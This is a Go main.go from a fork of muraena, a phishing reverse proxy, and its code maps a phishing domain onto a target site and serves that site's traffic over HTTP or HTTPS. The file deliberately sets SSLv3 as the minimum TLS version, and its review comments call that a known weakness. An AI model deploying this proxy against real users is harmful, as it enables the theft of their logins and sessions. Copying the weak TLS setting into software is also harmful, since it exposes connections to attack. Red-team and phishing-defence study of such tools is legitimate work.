forked from muraenateam/muraena
main.go
package main
import (
"crypto/tls"
"crypto/x509"
"fmt"
"net"
"net/http"
"os"
"github.com/muraenateam/muraena/log"
"github.com/muraenateam/muraena/module"
"github.com/muraenateam/muraena/proxy"
"github.com/muraenateam/muraena/session"
"github.com/evilsocket/islazy/tui"
)
// TLSServer bundles an http.Server with the PEM material that ServeTLS uses
// to build its TLS listener.
type TLSServer struct {
	http.Server

	// Cert and Key are the server certificate and its private key. ServeTLS
	// hands their bytes to tls.X509KeyPair, which expects PEM encoding.
	Cert string
	Key  string

	// CertPool is an optional PEM bundle of CA certificates. When non-empty,
	// ServeTLS parses it and assigns the pool to tls.Config.ClientCAs.
	CertPool string
}
// ServeTLS listens on addr over TCP, wraps the listener in TLS using the
// certificate and key held by the receiver, and serves HTTP on it until the
// embedded http.Server returns.
//
// It returns the error from parsing the key pair, from binding the address,
// or from Serve. A CertPool that fails to parse is only logged; serving
// continues with an empty pool.
func (server *TLSServer) ServeTLS(addr string) (err error) {
	keyPair, err := tls.X509KeyPair([]byte(server.Cert), []byte(server.Key))
	if err != nil {
		return err
	}

	// The minimum protocol version is deliberately lowered so that old clients
	// can still connect.
	// NOTE(review): tls.VersionSSL30 is deprecated in crypto/tls and SSLv3 is
	// a broken protocol; recent Go toolchains no longer negotiate it, so the
	// effective floor depends on the Go version this is built with. Anything
	// below TLS 1.2 should be treated as a known weakness of this listener.
	conf := &tls.Config{
		MinVersion:               tls.VersionSSL30,
		PreferServerCipherSuites: true,
		SessionTicketsDisabled:   true,
		// Only HTTP/1.1 is offered through ALPN.
		NextProtos:   []string{"http/1.1"},
		Certificates: []tls.Certificate{keyPair},
	}

	// Optional CA bundle, supplied for custom CAs.
	// NOTE(review): ClientCAs is only consulted when ClientAuth asks for a
	// client certificate; ClientAuth is left at its zero value here, so this
	// pool does not restrict who may connect.
	if server.CertPool != "" {
		pool := x509.NewCertPool()
		if ok := pool.AppendCertsFromPEM([]byte(server.CertPool)); !ok {
			log.Error("Error handling certpool")
		}
		conf.ClientCAs = pool
	}

	listener, err := net.Listen("tcp", addr)
	if err != nil {
		return err
	}

	return server.Serve(tls.NewListener(listener, conf))
}
// main creates the session, initializes logging, loads the modules and the
// replacement rules, registers a catch-all HTTP handler and then blocks
// serving the reverse proxy on all interfaces: port 443 over TLS when TLS is
// enabled in the configuration, port 80 in clear text otherwise.
func main() {
	sess, err := session.New()
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	// Tell the operator why the output is plain: colors were either switched
	// off through the options or are not supported by the terminal.
	if !tui.Effects() {
		notice := "\n\nWARNING: This terminal does not support colors, view will be very limited.\n\n"
		if *sess.Options.NoColors {
			notice = "\n\nWARNING: Terminal colors have been disabled, view will be very limited.\n\n"
		}
		fmt.Print(notice)
	}

	// Buffered logging must be ready before modules start emitting events.
	log.Init(sess.Config.Proxy.Log.Enabled, sess.Config.Proxy.Log.FilePath, sess.Config.Proxy.Log.BufferedLogDelay)

	module.LoadModules(sess)

	// Build the replacement rules from the proxy and crawler configuration.
	replacer := &proxy.Replacer{
		Phishing:             sess.Config.Proxy.Phishing,
		Target:               sess.Config.Proxy.Target,
		ExternalOrigin:       sess.Config.Crawler.ExternalOrigins,
		ExternalOriginPrefix: sess.Config.Crawler.ExternalOriginPrefix,
		OriginsMapping:       sess.Config.Crawler.OriginsMapping,
		TBodyUniversal:       sess.Config.Proxy.Transform.Response.Body.Universal,
		TBodyCustom:          sess.Config.Proxy.Transform.Response.Body.Custom,
	}
	if err := replacer.DomainMapping(); err != nil {
		log.Fatal(err.Error())
	}
	replacer.MakeReplacements()

	// Every request path is routed to the proxy handler; a fresh SessionType
	// is built per request around the shared session and replacer.
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		handler := &proxy.SessionType{Session: sess, Replacer: replacer}
		handler.HandleFood(w, r)
	})

	// announce writes the start-up banner to both the console log and the
	// buffered log.
	announce := func(format string) {
		banner := fmt.Sprintf(format,
			tui.Yellow(sess.Config.Proxy.Phishing), tui.Green(sess.Config.Proxy.Target))
		log.Info(banner)
		log.BufLogInfo(banner)
	}

	// The listener binds every interface in both modes.
	const bindHost = "0.0.0.0"

	if !sess.Config.TLS.Enabled {
		plain := &http.Server{Addr: fmt.Sprintf("%s:80", bindHost)}
		announce("Muraena Reverse Proxy waiting for food on HTTP...\n[ %s ] ==> [ %s ]")
		if err := plain.ListenAndServe(); err != nil {
			log.Fatal("Error binding Muraena on HTTP: %s", err)
		}
		return
	}

	announce("Muraena Reverse Proxy waiting for food on HTTPS...\n[ %s ] ==> [ %s ]")
	secure := &TLSServer{
		Cert:     sess.Config.TLS.Certificate,
		Key:      sess.Config.TLS.Key,
		CertPool: sess.Config.TLS.Root,
	}
	if err := secure.ServeTLS(fmt.Sprintf("%s:443", bindHost)); err != nil {
		log.Fatal("Error binding Muraena on HTTPS: %s", err)
	}
}